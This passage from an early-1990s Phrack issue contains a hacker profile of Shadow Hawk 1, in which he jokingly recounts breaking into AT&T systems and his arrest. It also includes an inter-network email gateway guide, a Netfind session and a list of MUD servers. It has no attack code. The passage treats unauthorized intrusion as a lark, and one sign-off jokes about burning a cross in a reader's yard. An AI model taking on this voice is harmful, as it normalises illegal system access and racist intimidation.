High Society, or Hustler, while at the same time exhibiting your mighty hacker
|
|
power. Enjoy the newfound fame and elitism that you will receive from your
|
|
friends and loved ones. GOD BLESS AMERICA!
|
|
|
|
*****************************************************
|
|
|
|
This file was brought to you by Cyber-Redneck a/k/a Johnny Rotten, and
|
|
Shitkickin' Jim a/k/a Dispater.
|
|
|
|
Iffin you don't like this here file, we will burn a cross in your yard, and
|
|
might even tell the BellCo geek to cut your line off. He's still tied up in
|
|
Shitkickin' Jim's basement.
|
|
_______________________________________________________________________________
|
|
|
|
|
|
|
|
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Four, Issue Thirty-Nine, File 3 of 13
|
|
|
|
==Phrack Pro-Phile==
|
|
|
|
Written by Dispater
|
|
|
|
Created by Taran King (1986)
|
|
|
|
|
|
Welcome to Phrack Pro-Phile. Phrack Pro-Phile is created to bring info to
|
|
you, the users, about old or highly important/controversial people. This
|
|
month, I bring to you the one of the earlier hackers to make headlines and
|
|
legal journals due to computer hacking...
|
|
|
|
(_>Shadow Hawk 1<_)
|
|
|
|
_______________________________________________________________________________
|
|
|
|
Personal
|
|
~~~~~~~~
|
|
Handle: (_>Shadow Hawk 1<_)
|
|
Call me: Herb
|
|
Past handles: Feyd Rautha, Captain Beyond, Mental Cancer
|
|
Handle origin: Stolen from the name of an 8-bit Atari 800 game that
|
|
seemed to be written in the language RGL (anyone got it
|
|
for the IBM? ;-) ).
|
|
Date of Birth: August 6, 1970
|
|
Age at current date: 21
|
|
Height: 6'2"
|
|
Weight: 190 lbs.
|
|
Eye color: Gray
|
|
Hair color: Brown
|
|
Computer: 386/Linux
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
I started working with computers in the 6th grade with an Atari 800 and
|
|
a cassette drive. I added a modem and a disk drive and started researching
|
|
other computer systems [checking out other hacker's conquests ;-) ].
|
|
Eventually, I decided that UNIX was to be the OS of choice.
|
|
|
|
As a child, I was always curious about stuff in my own reality, so
|
|
naturally, when computers became available...
|
|
|
|
I first owned an Atari 800, then an Atari ST 1040, followed by a short-
|
|
lived Unix-PC 3B1, and a lame 20MHz 386. Currently, I have a 33MHz 386. Most
|
|
of my hacking-type knowledge came from a text file that listed a few Unix
|
|
defaults; I used those to go and learn more on my own. Other OSes, I just
|
|
hacked at random 8-).
|
|
|
|
I started out with systems that had already been penetrated and I built up
|
|
my own database of systems from there. I wasn't too clever in the beginning,
|
|
though, and lost a few systems to perceptive sys-admins.
|
|
|
|
I specialized in Unix, though I enjoyed toying with obscure systems
|
|
(RSX-11, Sorbus Realtime Basic, etc.)
|
|
|
|
In the hack/phreak world, I used to hang out with The Prophet, The Serpent
|
|
(Chicago), The Warrior, and others for short periods of time, who shall remain
|
|
nameless.
|
|
|
|
As far as what were memorable hack/phreak BBSes, I'd have to say none...
|
|
Not that there weren't any, but I have just forgotten them all.
|
|
|
|
My accomplishments in the phreak/hack world include writing a few text
|
|
files, typing in a few books, getting in lots of systems, and learning a bit
|
|
about the Unix OS. Other than that, absolutely nothing; my life is computers!
|
|
(NOT!)
|
|
|
|
I _was_ associated with the J-Men a few years back, but that's the only
|
|
hack/phreak group that I ever had anything to do with.
|
|
|
|
I was busted for overzealousness in penetrating AT&T computer networks and
|
|
systems. I stupidly made calls from my unprotected home phone. I got caught
|
|
trying to snag Unix SysV 3.5 68K kernel source.
|
|
|
|
I had already given up the practice of sharing information when I realized
|
|
how quickly systems went away after their numbers and logins were posted 8-).
|
|
After I got busted, I decided it might be best to limit my hacking to those
|
|
strata of reality on which it is not (yet) prohibited to hack ;-) .
|
|
|
|
In real life, I originally was going to be an EE/CS major in school, but
|
|
now, I'm leaning towards math/modeling/nonlinear dynamics. Work when necessary
|
|
8-|.
|
|
|
|
I'm into making music, drawing strange pictures, and exploring the nether
|
|
regions of physical reality. Occasionally I am seen at sci-fi conventions in
|
|
various forms and personages.
|
|
|
|
I feel seriously against taking things too seriously. If you can master
|
|
that, you've got it all beat!
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
(_>Shadow Hawk 1<_)'s Favorite Things
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
Work: Nihilist Ontologist.
|
|
Cars: Fast & Loud.
|
|
Foods: I like a little of every cuisine, except those involving large
|
|
amounts of horseradish, beets, raw tomatoes, etc.
|
|
Music: Ecumenical.
|
|
Authors: R.A. Wilson is good for kicks; other than that I haven't read
|
|
much fiction lately. Lots of non-fiction.
|
|
Books: Illuminatus, Stranger in a Strange Land, Man or Matter, Godel
|
|
Escher and Bach, The Book of the SubGenius.
|
|
Performers: The people at NASA, the U.S. government beings at Washington,
|
|
the nightly news.
|
|
Sex: Yes.
|
|
|
|
Most Memorable Experience
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
Coming home to a house full of Secret Service, FBI, NSA, DIA, and AT&T agents
|
|
after getting really stoned with some neighborhood friends, and then having
|
|
them take everything electronic that didn't appear to be a household appliance
|
|
EXCEPT the obviously stolen/dangerous items: a digital power meter, a He-Ne
|
|
laser, and jars of chemicals for making bombs. HUMOR AT ITS FINEST!
|
|
|
|
Some People to Mention
|
|
~~~~~~~~~~~~~~~~~~~~~~
|
|
o Thanks to Bill Cook for leaving no stone unturned in my personal life!
|
|
o Thanks to "my" lawyer, Karen Plant, for leaving MANY stones unturned in
|
|
helping to decide my fate!
|
|
o Thanks to the U.S. Federal Justice System for sentencing me to a 9 months
|
|
in a "juvenile facility" (as well as confiscating thousands of dollars of
|
|
stuff, some legal & some not) while allowing burglars, politicians, and
|
|
virus-authors to go free with a slap on the wrist!
|
|
o Thanks for Operation Sun-Devil, without which, the venerable Ripco BBS
|
|
would still be in its first incarnation!
|
|
|
|
A Few Other Things
|
|
~~~~~~~~~~~~~~~~~~
|
|
I'd like to thank all the great beings at Lunatic Labs for not removing my
|
|
account while I was sight-seeing in South Dakota. HI! to all my TRUE friends
|
|
(you know who you are) and all the FALSE ones too! Where would I be now
|
|
without you? Thanks to all those who love me enough to want to control my
|
|
mind. And, of course, THANKS to the hack/phreak community in general for not
|
|
only becoming, as most countercultures do, decadent and passe, but also for
|
|
still bugging me after all these years!
|
|
|
|
The Future: well, if reality doesn't cave itself in TOO badly with all of the
|
|
virtuality that's on its way, it should be a great time for all to play with
|
|
the "net!"
|
|
|
|
Inside jokes: HALOHALOHALOHALOHALOHALOHALOHALOHALOSKSKSKSKSKSKSKSKSKSKSKSKSK
|
|
eaerlyeaerlyeaerlyeaerlyeaerlyeaerly... the gwampismobile shall ride again!
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
Of the general population of phreaks you have met, would you consider most
|
|
phreaks, if any, to be computer geeks?
|
|
|
|
Well, as far as geeking goes, all are free to pursue their interests. It
|
|
is important to remember that social evolution and mental evolution do not
|
|
necessarily occur simultaneously, or instantaneously (usually).
|
|
_______________________________________________________________________________
|
|
|
|
|
|
|
|
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Four, Issue Thirty-Nine, File 4 of 13
|
|
|
|
Network Miscellany V
|
|
Compiled from Internet Sources
|
|
by Datastream Cowboy
|
|
|
|
Network Miscellany created by Taran King
|
|
|
|
|
|
University of Colorado Netfind Server
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
Trying 128.138.243.151 ...
|
|
Connected to bruno.cs.colorado.edu.
|
|
Escape character is '^]'.
|
|
|
|
|
|
SunOS UNIX (bruno)
|
|
|
|
login: netfind
|
|
|
|
=====================================================
|
|
Welcome to the University of Colorado Netfind server.
|
|
=====================================================
|
|
|
|
I think that your terminal can display 24 lines.
|
|
If this is wrong, please enter the "Other" menu and
|
|
set the correct number of lines.
|
|
|
|
Help/Search/Other/Quit [h/s/o/q]: h
|
|
|
|
Given the name of a person on the Internet and a rough description of where
|
|
the person works, Netfind attempts to locate information about the person.
|
|
When prompted, enter a name followed by a set of keywords, such as
|
|
|
|
schwartz university colorado boulder
|
|
|
|
The name can be a first, last, or login name. The keys describe where the
|
|
person works, by the name of the institution and/or the city/state/country.
|
|
|
|
If you know the institution's domain name (e.g., "cs.colorado.edu", where there
|
|
are host names like "brazil.cs.colorado.edu") you can specify it as keys
|
|
without the dots (e.g., "cs colorado edu"). Keys are case insensitive and may
|
|
be specified in any order. Using more than one key implies the logical AND of
|
|
the keys. Specifying too many keys may cause searches to fail. If this
|
|
happens, try specifying fewer keys, e.g.,
|
|
|
|
schwartz boulder
|
|
|
|
If you specify keys that match many domains, Netfind will list some of the
|
|
matching domains/organizations and ask you to form a more specific search.
|
|
Note that you can use any of the words in the organization strings (in addition
|
|
to the domain components) as keys in future searches.
|
|
|
|
Organization lines are gathered from imperfect sources. However, it is usually
|
|
easy to tell when they are incorrect or not fully descriptive. Even if the
|
|
organization line is incorrect/vague, the domain name listed will still work
|
|
properly for searches. Often you can "guess" the proper domain.
|
|
|
|
For example, "cs.<whatever>.edu" is usually the computer science department at
|
|
a university, even if the organization line doesn't make this clear.
|
|
|
|
When Netfind runs, it displays a trace of the parallel search progress, along
|
|
with the results of the searches. Since output can scroll by quickly, you
|
|
might want to run it in a window system, or pipe the output through tee(1):
|
|
|
|
rlogin <this server name> -l netfind |& tee log
|
|
|
|
You can also disable trace output from the "Other" menu.
|
|
|
|
You can get the Netfind software by anonymous FTP from ftp.cs.colorado.edu,
|
|
in pub/cs/distribs/netfind. More complete documentation is also available
|
|
in that package. A paper describing the methodology is available in
|
|
pub/cs/techreports/schwartz/RD.Papers/PostScript/White.Pages.ps.Z
|
|
(compressed PostScript) or
|
|
pub/cs/techreports/schwartz/RD.Papers/ASCII/White.Pages.txt.Z (compressed
|
|
ASCII).
|
|
|
|
Please send comments/questions to schwartz@cs.colorado.edu. If you would like
|
|
to be added to the netfind-users list (for software updates and other
|
|
discussions, etc.), send mail to:
|
|
|
|
netfind-users-request@cs.colorado.edu.
|
|
|
|
Help/Search/Other/Quit [h/s/o/q]: q
|
|
|
|
Exiting Netfind server...
|
|
|
|
Connection closed by foreign host.
|
|
_______________________________________________________________________________
|
|
|
|
Commercial Networks Reachable From The Internet
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By Roman Kanala (kanala@sc2a.unige.ch), CUEPE, University of Geneva
|
|
|
|
1. Internet to X.400
|
|
====================
|
|
|
|
An X.400 address in form
|
|
|
|
First name : Fffff
|
|
Surname : Nnnnn
|
|
Organization : Ooooo
|
|
ADMD : Aaaaa
|
|
Country : Cc
|
|
|
|
looks in RFC822 (Internet) addressing like
|
|
|
|
/G=Fffff/S=Nnnnn/O=Ooooo/@Aaaa.Cc
|
|
or
|
|
in%"/G=Fffff/S=Nnnnn/O=Ooooo/@Aaaa.Cc"
|
|
|
|
|
|
|
|
2. Any X.400 to Internet
|
|
========================
|
|
|
|
My Internet address
|
|
|
|
kanala@sc2a.unige.ch
|
|
|
|
can be written for X.400 services (like arCom400 in Switzerland,
|
|
Sprint MAIL or MCI Mail in the USA) as follows:
|
|
|
|
C=CH; ADMD=ARCOM; PRMD=SWITCH; O=UNIGE; OU=SC2A; S=KANALA
|
|
|
|
and in Internet RFC822 form (althrough I don't see any reason to do it
|
|
this way for sending messages from Internet to Internet):
|
|
|
|
/S=Kanala/OU=sc2a/O=UniGe/P=Switch/@arcom.ch
|
|
|
|
|
|
3. MCI Mail to Internet (via a gateway)
|
|
=======================
|
|
|
|
If you are in the USA and using MCI Mail, then you can write to Internet
|
|
addresses as follows:
|
|
|
|
TO: Roman Kanala (EMS)
|
|
EMS: INTERNET
|
|
MBX: kanala@sc2a.unige.ch
|
|
|
|
The gateway from MCI Mail to Internet is accessed by referencing the user's
|
|
name as though he were on an EMS service. When EMS name of INTERNET is used
|
|
for example, in the USA, then it's in order to have NRI (Reston VA) handle the
|
|
message for him. When prompted for mailbox MBX, user enters the Internet
|
|
address he is wanting to send a message to.
|
|
|
|
|
|
4. Internet to MCI Mail
|
|
=======================
|
|
|
|
The general address form is username@mcimail.com, where the username is in one
|
|
of two forms: either full username or the numerical box number in form of
|
|
digits only and preceded by three zeros, for ex. 0001234567@mcimail.com
|
|
(address 1234567 is ficticious).
|
|
|
|
|
|
5. AppleLink to Internet or Bitnet
|
|
==================================
|
|
|
|
Internet address is used with a suffix @INTERNET#, like
|
|
|
|
kanala@sc2a.unige.ch@internet#
|
|
or kanala@cgeuge52.bitnet@internet#
|
|
|
|
(here cgeuge52 is the bitnet address of sc2a.unige.ch)
|
|
|
|
|
|
6. Internet or Bitnet to AppleLink
|
|
==================================
|
|
|
|
AppleLink address is used as if it were an Internet username on the
|
|
AppleLink.Apple.Com node, like:
|
|
|
|
CH0389@applelink.apple.com
|
|
|
|
|
|
7. CompuServe to Internet
|
|
=========================
|
|
|
|
In the address field from CompuServe, type the symbol >, "greater than", the
|
|
word "INTERNET" in uppercase characters, then a space followed by the Internet
|
|
address, like:
|
|
|
|
>INTERNET kanala@sc2a.unige.ch
|
|
|
|
|
|
8. Internet to CompuServe
|
|
=========================
|
|
|
|
The CompuServe address is used followed by "@compuserve.com". In the
|
|
CompuServe mailbox number the comma is replaces by a period, example:
|
|
|
|
12345.678@compuserve.com (address 12345.678 is ficticious)
|
|
_______________________________________________________________________________
|
|
|
|
Inter-Network Mail Guide
|
|
~~~~~~~~~~~~~~~~~~~~~~~~
|
|
This document is Copyright 1990 by John J. Chew. All rights reserved.
|
|
Permission for non-commercial distribution is hereby granted, provided
|
|
that this file is distributed intact, including this copyright notice
|
|
and the version information above. Permission for commercial
|
|
distribution can be obtained by contacting the author as described
|
|
below.
|
|
|
|
INTRODUCTION
|
|
|
|
This file documents methods of sending mail from one network to another. It
|
|
represents the aggregate knowledge of the readers of comp.mail.misc and many
|
|
contributors elsewhere. If you know of any corrections or additions to this
|
|
file, please read the file format documentation below and then mail to me:
|
|
|
|
John J. Chew <poslfit@gpu.utcs.utoronto.ca>
|
|
|
|
|
|
DISTRIBUTION
|
|
|
|
(news) This list is posted monthly to Usenet newsgroups comp.mail.misc and
|
|
news.newusers.questions.
|
|
(mail) I maintain a growing list of subscribers who receive each monthly
|
|
issue by electronic mail, and recommend this to anyone planning to
|
|
redistribute the list on a regular basis.
|
|
(FTP) Internet users can fetch this guide by anonymous FTP as ~ftp/pub/docs/
|
|
internetwork-mail-guide on Ra.MsState.Edu (130.18.80.10 or 130.18.96.37)
|
|
[Courtesy of Frank W. Peters]
|
|
(Listserv) Bitnet users can fetch this guide from the Listserv at UNMVM.
|
|
Send mail to LISTSERV@UNMVM with blank subject and body consisting of
|
|
the line "GET NETWORK GUIDE". [Courtesy of Art St. George]
|
|
|
|
|
|
HOW TO USE THIS GUIDE
|
|
|
|
Each entry in this file describes how to get from one network to another. To
|
|
keep this file at a reasonable size, methods that can be generated by
|
|
transitivity (A->B and B->C gives A->B->C) are omitted. Entries are sorted
|
|
first by source network and then by destination network. This is what a
|
|
typical entry looks like:
|
|
|
|
#F mynet
|
|
#T yournet
|
|
#R youraddress
|
|
#C contact address if any
|
|
#I send to "youraddress@thegateway"
|
|
|
|
For parsing purposes, entries are separated by at least one blank line, and
|
|
each line of an entry begins with a "#" followed by a letter. Lines beginning
|
|
with "#" are comments and need not be parsed. Lines which do not start with a
|
|
"#" at all should be ignored as they are probably mail or news headers.
|
|
|
|
#F (from) and #T (to) lines specify source and destination networks. If you're
|
|
sending me information about a new network, please give me a brief description
|
|
of the network so that I can add it to the list below. The abbreviated network
|
|
names used in #F and #T lines should consist only of the characters a-z, 0-9
|
|
and "-" unless someone can make a very convincing case for their favourite pi
|
|
character.
|
|
|
|
These are the currently known networks with abbreviated names:
|
|
|
|
applelink AppleLink (Apple Computer, Inc.'s in-house network)
|
|
bitnet international academic network
|
|
bix Byte Information eXchange: Byte magazine's commercial BBS
|
|
bmug Berkeley Macintosh Users Group
|
|
compuserve commercial time-sharing service
|
|
connect Connect Professional Information Network (commercial)
|
|
easynet Easynet (DEC's in-house mail system)
|
|
envoy Envoy-100 (Canadian commercial mail service)
|
|
fax Facsimile document transmission
|
|
fidonet PC-based BBS network
|
|
geonet GeoNet Mailbox Systems (commercial)
|
|
internet the Internet
|
|
mci MCI's commercial electronic mail service
|
|
mfenet Magnetic Fusion Energy Network
|
|
nasamail NASA internal electronic mail
|
|
peacenet non-profit mail service
|
|
sinet Schlumberger Information NETwork
|
|
span Space Physics Analysis Network (includes HEPnet)
|
|
sprintmail Sprint's commercial mail service (formerly Telemail)
|
|
thenet Texas Higher Education Network
|
|
|
|
#R (recipient) gives an example of an address on the destination network, to
|
|
make it clear in subsequent lines what text requires subsitution.
|
|
|
|
#C (contact) gives an address for inquiries concerning the gateway, expressed
|
|
as an address reachable from the source (#F) network. Presumably, if you can't
|
|
get the gateway to work at all, then knowing an unreachable address on another
|
|
network will not be of great help.
|
|
|
|
#I (instructions) lines, of which there may be several, give verbal
|
|
instructions to a user of the source network to let them send mail to a user on
|
|
the destination network. Text that needs to be typed will appear in double
|
|
quotes, with C-style escapes if necessary.
|
|
|
|
#F applelink
|
|
#T internet
|
|
#R user@domain
|
|
#I send to "user@domain@internet#"
|
|
#I domain can be be of the form "site.bitnet", address must be <35
|
|
characters
|
|
|
|
#F bitnet
|
|
#T internet
|
|
#R user@domain
|
|
#I Methods for sending mail from Bitnet to the Internet vary depending on
|
|
#I what mail software is running at the Bitnet site in question. In the
|
|
#I best case, users should simply be able to send mail to "user@domain".
|
|
#I If this doesn't work, try "user%domain@gateway" where "gateway" is a
|
|
#I regional Bitnet-Internet gateway site. Finally, if neither of these
|
|
#I works, you may have to try hand-coding an SMTP envelope for your mail.
|
|
#I If you have questions concerning this rather terse note, please try
|
|
#I contacting your local postmaster or system administrator first before
|
|
#I you send me mail -- John Chew <poslfit@gpu.utcs.utoronto.ca>
|
|
|
|
#F compuserve
|
|
#T fax
|
|
#R +1 415 555 1212
|
|
#I send to "FAX 14155551212" (only to U.S.A.)
|
|
|
|
#F compuserve
|
|
#T internet
|
|
#R user@domain
|
|
#I send to ">INTERNET:user@domain"
|
|
|
|
#F compuserve
|
|
#T mci
|
|
#R 123-4567
|
|
#I send to ">MCIMAIL:123-4567"
|
|
|
|
#F connect
|
|
#T internet
|
|
#R user@domain
|
|
#I send to CONNECT id "DASNET"
|
|
#I first line of message: "\"user@domain\"@DASNET"
|
|
|
|
#F easynet
|
|
#T bitnet
|
|
#R user@site
|
|
#C DECWRL::ADMIN
|
|
#I from VMS use NMAIL to send to "nm%DECWRL::\"user@site.bitnet\""
|
|
#I from Ultrix
|
|
#I send to "user@site.bitnet" or if that fails
|
|
#I (via IP) send to "\"user%site.bitnet\"@decwrl.dec.com"
|
|
#I (via DECNET) send to "DECWRL::\"user@site.bitnet\""
|
|
|
|
#F easynet
|
|
#T fidonet
|
|
#R john smith at 1:2/3.4
|
|
#C DECWRL::ADMIN
|
|
#I from VMS use NMAIL to send to
|
|
#I "nm%DECWRL::\"john.smith@p4.f3.n2.z1.fidonet.org\""
|
|
#I from Ultrix
|
|
#I send to "john.smith@p4.f3.n2.z1.fidonet.org" or if that fails
|
|
#I (via IP) send to
|
|
\"john.smith%p4.f3.n2.z1.fidonet.org\"@decwrl.dec.com"
|
|
#I (via DECNET) send to "DECWRL::\"john.smith@p4.f3.n2.z1.fidonet.org\""
|
|
|
|
#F easynet
|
|
#T internet
|
|
#R user@domain
|
|
#C DECWRL::ADMIN
|
|
#I from VMS use NMAIL to send to "nm%DECWRL::\"user@domain\""
|
|
#I from Ultrix
|
|
#I send to "user@domain" or if that fails
|
|
#I (via IP) send to "\"user%domain\"@decwrl.dec.com"
|
|
#I (via DECNET) send to "DECWRL::\"user@domain\""
|
|
|
|
#F envoy
|
|
#T internet
|
|
#R user@domain
|
|
#C ICS.TEST or ICS.BOARD
|
|
#I send to "[RFC-822=\"user(a)domain\"]INTERNET/TELEMAIL/US
|
|
#I for special characters, use @=(a), !=(b), _=(u), any=(three octal digits)
|
|
|
|
#F fidonet
|
|
#T internet
|
|
#R user@domain
|
|
#I send to "uucp" at nearest gateway site
|
|
#I first line of message: "To: user@domain"
|
|
|
|
#F geonet
|
|
#T internet
|
|
#R user@domain
|
|
#I send to "DASNET"
|
|
#I subject line: "user@domain!subject"
|
|
|
|
#F internet
|
|
#T applelink
|
|
#R user
|
|
#I send to "user@applelink.apple.com"
|
|
|
|
#F internet
|
|
#T bitnet
|
|
#R user@site
|
|
#I send to "user%site.bitnet@gateway" where "gateway" is a gateway host that
|
|
#I is on both the internet and bitnet. Some examples of gateways are:
|
|
#I cunyvm.cuny.edu mitvma.mit.edu. Check first to see what local policies
|
|
#I are concerning inter-network forwarding.
|
|
|
|
#F internet
|
|
#T bix
|
|
#R user
|
|
#I send to "user@dcibix.das.net"
|
|
|
|
#F internet
|
|
#T bmug
|
|
#R John Smith
|
|
#I send to "John.Smith@bmug.fidonet.org"
|
|
|
|
#F internet
|
|
#T compuserve
|
|
#R 71234,567
|
|
#I send to "71234.567@compuserve.com"
|
|
#I note: Compuserve account IDs are pairs of octal numbers. Ordinary
|
|
#I consumer CIS user IDs begin with a `7' as shown.
|
|
|
|
#F internet
|
|
#T connect
|
|
#R NAME
|
|
#I send to "NAME@dcjcon.das.net"
|
|
|
|
#F internet
|
|
#T easynet
|
|
#R HOST::USER
|
|
#C admin@decwrl.dec.com
|
|
#I send to "user@host.enet.dec.com" or "user%host.enet@decwrl.dec.com"
|
|
|
|
#F internet
|
|
#T easynet
|
|
#R John Smith @ABC
|
|
#C admin@decwrl.dec.com
|
|
#I send to "John.Smith@ABC.MTS.DEC.COM"
|
|
#I (This syntax is for All-In-1 users.)
|
|
|
|
#F internet
|
|
#T envoy
|
|
#R John Smith (ID=userid)
|
|
#C /C=CA/ADMD=TELECOM.CANADA/ID=ICS.TEST/S=TEST_GROUP/@nasamail.nasa.gov
|
|
#C for second method only
|
|
#I send to "uunet.uu.net!att!attmail!mhs!envoy!userid"
|
|
#I or to "/C=CA/ADMD=TELECOM.CANADA/DD.ID=userid/PN=John_Smith/@Sprint.COM"
|
|
|
|
#F internet
|
|
#T fidonet
|
|
#R john smith at 1:2/3.4
|
|
#I send to "john.smith@p4.f3.n2.z1.fidonet.org"
|
|
|
|
#F internet
|
|
#T geonet
|
|
#R user at host
|
|
#I send to "user:host@map.das.net"
|
|
#I American host is geo4, European host is geo1.
|
|
|
|
#F internet
|
|
#T mci
|
|
#R John Smith (123-4567)
|
|
#I send to "1234567@mcimail.com"
|
|
#I or send to "JSMITH@mcimail.com" if "JSMITH" is unique
|
|
#I or send to "John_Smith@mcimail.com" if "John Smith" is unique - note the
|
|
#I underscore!
|
|
#I or send to "John_Smith/1234567@mcimail.com" if "John Smith" is NOT unique
|
|
|
|
#F internet
|
|
#T mfenet
|
|
#R user@mfenode
|
|
#I send to "user%mfenode.mfenet@nmfecc.arpa"
|
|
|
|
#F internet
|
|
#T nasamail
|
|
#R user
|
|
#C <postmaster@ames.arc.nasa.gov>
|
|
#I send to "user@nasamail.nasa.gov"
|
|
|
|
#F internet
|
|
#T peacenet
|
|
#R user
|
|
#C <support%cdp@arisia.xerox.com>
|
|
#I send to "user%cdp@arisia.xerox.com"
|
|
|
|
#F internet
|
|
#T sinet
|
|
#R node::user or node1::node::user
|
|
#I send to "user@node.SINet.SLB.COM" or "user%node@node1.SINet.SLB.COM"
|
|
|
|
#F internet
|
|
#T span
|
|
#R user@host
|
|
#C <NETMGR@nssdca.gsfc.nasa.gov>
|
|
#I send to "user@host.span.NASA.gov"
|
|
#I or to "user%host.span@ames.arc.nasa.gov"
|
|
|
|
#F internet
|
|
#T sprintmail
|
|
#R [userid "John Smith"/organization]system/country
|
|
#I send to
|
|
/C=country/ADMD=system/O=organization/PN=John_Smith/DD.ID=userid/@Sprint.COM"
|
|
|
|
#F internet
|
|
#T thenet
|
|
#R user@host
|
|
#I send to "user%host.decnet@utadnx.cc.utexas.edu"
|
|
|
|
#F mci
|
|
#T internet
|
|
#R John Smith <user@domain>
|
|
#I at the "To:" prompt type "John Smith (EMS)"
|
|
#I at the "EMS:" prompt type "internet"
|
|
#I at the "Mbx:" prompt type "user@domain"
|
|
|
|
#F nasamail
|
|
#T internet
|
|
#R user@domain
|
|
#I at the "To:" prompt type "POSTMAN"
|
|
#I at the "Subject:" prompt enter the subject of your message
|
|
#I at the "Text:" prompt, i.e. as the first line of your message,
|
|
#I enter "To: user@domain"
|
|
|
|
#F sinet
|
|
#T internet
|
|
#R user@domain
|
|
#I send to "M_MAILNOW::M_INTERNET::\"user@domain\""
|
|
#I or "M_MAILNOW::M_INTERNET::domain::user"
|
|
|
|
#F span
|
|
#T internet
|
|
#R user@domain
|
|
#C NETMGR@NSSDCA
|
|
#I send to "AMES::\"user@domain\""
|
|
|
|
#F sprintmail
|
|
#T internet
|
|
#R user@domain
|
|
#I send to "[RFC-822=user(a)domain @GATEWAY]INTERNET/TELEMAIL/US"
|
|
|
|
#F thenet
|
|
#T internet
|
|
#R user@domain
|
|
#I send to UTADNX::WINS%" user@domain "
|
|
|
|
_______________________________________________________________________________
|
|
|
|
MUDs
|
|
~~~~
|
|
By Frosty of CyberSpace Project
|
|
|
|
------------------------------------------------------------------------------
|
|
MUDWHO servers (5)
|
|
Name Address Numeric Address Port Status Notes
|
|
------------------------------------------------------------------------------
|
|
Amber amber.ecst.csuchico.edu 132.241.1.43 6889 up 1
|
|
DEC decuac.dec.com 192.5.214.1 6889 up 5
|
|
Littlewood littlewood.math.okstate. 139.78.1.13 6889 up 4
|
|
edu
|
|
Nova nova.tat.physik. 134.2.62.161 6889 up 3
|
|
uni-tuebingen.de
|
|
PernWHO milo.mit.edu 18.70.0.216 6889 up 2
|
|
------------------------------------------------------------------------------
|
|
AberMUDs (11)
|
|
Name Address Numeric Address Port Status Notes
|
|
------------------------------------------------------------------------------
|
|
Aber5@FSU loligo.cc.fsu.edu 128.186.2.99 5000 R*
|
|
DIRT ulrik.uio.no 129.240.2.4 6715 up 32
|
|
Dragon messua.informatik. 137.226.224.9 6715 up
|
|
rwth-aachen.de
|
|
Eddie aber eddie.ee.vt.edu 128.173.5.207 5000 TO
|
|
Alles
|
|
EnchantedMud neptune.calstatela.edu 130.182.193.1 6715 up 22
|
|
Longhorn lisboa.cs.utexas.edu 128.83.139.10 6715 up
|
|
Mustang MUD mustang.dell.com 143.166.224.42 6715 up
|
|
SpudMud stjoe.cs.uidaho.edu 129.101.128.7 6715 up
|
|
Temple bigboy.cis.temple.edu 129.32.32.98 6715 up
|
|
The Underground hal.gnu.ai.mit.edu 128.52.46.11 6715 R*
|
|
Wolf b.cs.wvu.wvnet.edu 129.71.11.2 6715 R*
|
|
------------------------------------------------------------------------------
|
|
DikuMUDs (17)
|
|
Name Address Numeric Address Port Status Notes
|
|
------------------------------------------------------------------------------
|
|
Albanian judy.indstate.edu 139.102.14.10 4000 R
|
|
DikuMUD
|
|
AlexMUD alex.stacken.kth.se 130.237.237.3 4000 up
|
|
*Alfa Diku alfa.me.chalmers.se 129.16.50.11 4000 up
|
|
Austin MUD austin.daimi.aau.dk 130.225.16.161 4000 R 29
|
|
Caltech DIKU eltanin.caltech.edu 131.215.139.53 4000 R
|
|
Copper Diku copper.denver.colorado. 132.194.10.1 4000 up 33
|
|
edu
|
|
Davis Diku fajita.ucdavis.edu 128.120.61.203 3000 up 28
|
|
DikuMUD I bigboy.cis.temple.edu 129.32.32.98 4000 up
|
|
Elof DikuMUD elof.iit.edu 192.41.245.90 4000 up
|
|
Epic hal.gnu.ai.mit.edu 128.52.46.11 9000 R
|
|
Grimne Diku flipper.pvv.unit.no 129.241.36.200 4000 R
|
|
HypeNet ???? 129.10.12.2 4000 TO
|
|
Matsci1 Diku matsci1.uncwil.edu 128.109.221.21 4000 up
|
|
Mudde hawk.svl.cdc.com 129.179.4.49 4000 up
|
|
Pathetique
|
|
Sejnet Diku sejnet.sunet.se 192.36.125.3 4000 up
|
|
Waterdeep shine.princeton.edu 128.112.120.28 4000 up
|
|
Wayne Diku venus.eng.wayne.edu 141.217.24.4 4000 R
|
|
------------------------------------------------------------------------------
|
|
DUMs (2)
|
|
Name Address Numeric Address Port Status Notes
|
|
------------------------------------------------------------------------------
|
|
CanDUM II cheetah.vlsi.waterloo. 129.97.128.253 2001 up
|
|
edu
|
|
DUM II legolas.cs.umu.se 130.239.88.5 2001 R 23
|
|
------------------------------------------------------------------------------
|
|
LPmuds (58)
|
|
Name Address Numeric Address Port Status Notes
|
|
------------------------------------------------------------------------------
|
|
Aegolius vyonous.kennesaw.edu 130.218.13.19 2000 up
|
|
Acadicus
|
|
After Hours janice.cc.wwu.edu 140.160.240.28 2000 up 30
|
|
Akropolis ???? 139.124.40.4 6666 up
|
|
Allinite ???? 134.126.21.223 2222 up
|
|
BatMUD palikka.jyu.fi 130.234.0.3 2001 up
|
|
*CyberWorld newview.etsu.edu 192.43.199.33 3000 up 34
|
|
*Darkemud dunix.drake.edu 192.84.11.2 4040 up 26
|
|
Darker Realms worf.tamu.edu 128.194.51.189 2000 up
|
|
Dartmouth LPMud lusty.tamu.edu 128.194.10.118 2000 up
|
|
Deeper Trouble alk.iesd.auc.dk 130.225.48.46 4242 up
|
|
DevMUD huey.cc.utexas.edu 128.83.135.2 9300 R
|
|
DiscWorld II peregrin.resmel.bhp.com. 134.18.1.12 2000 up
|
|
au
|
|
Dragon's Den ???? 129.25.7.111 2222 up
|
|
End Of The Line mud.stanford.edu 36.21.0.47 2010 up 35
|
|
Finnegan's Wake maxheadroom.agps.lanl. 192.12.184.10 2112 up
|
|
gov
|
|
Frontier blish.cc.umanitoba.ca 130.179.168.77 9165 up
|
|
GateWay secum.cs.dal.ca 129.173.24.31 6969 up
|
|
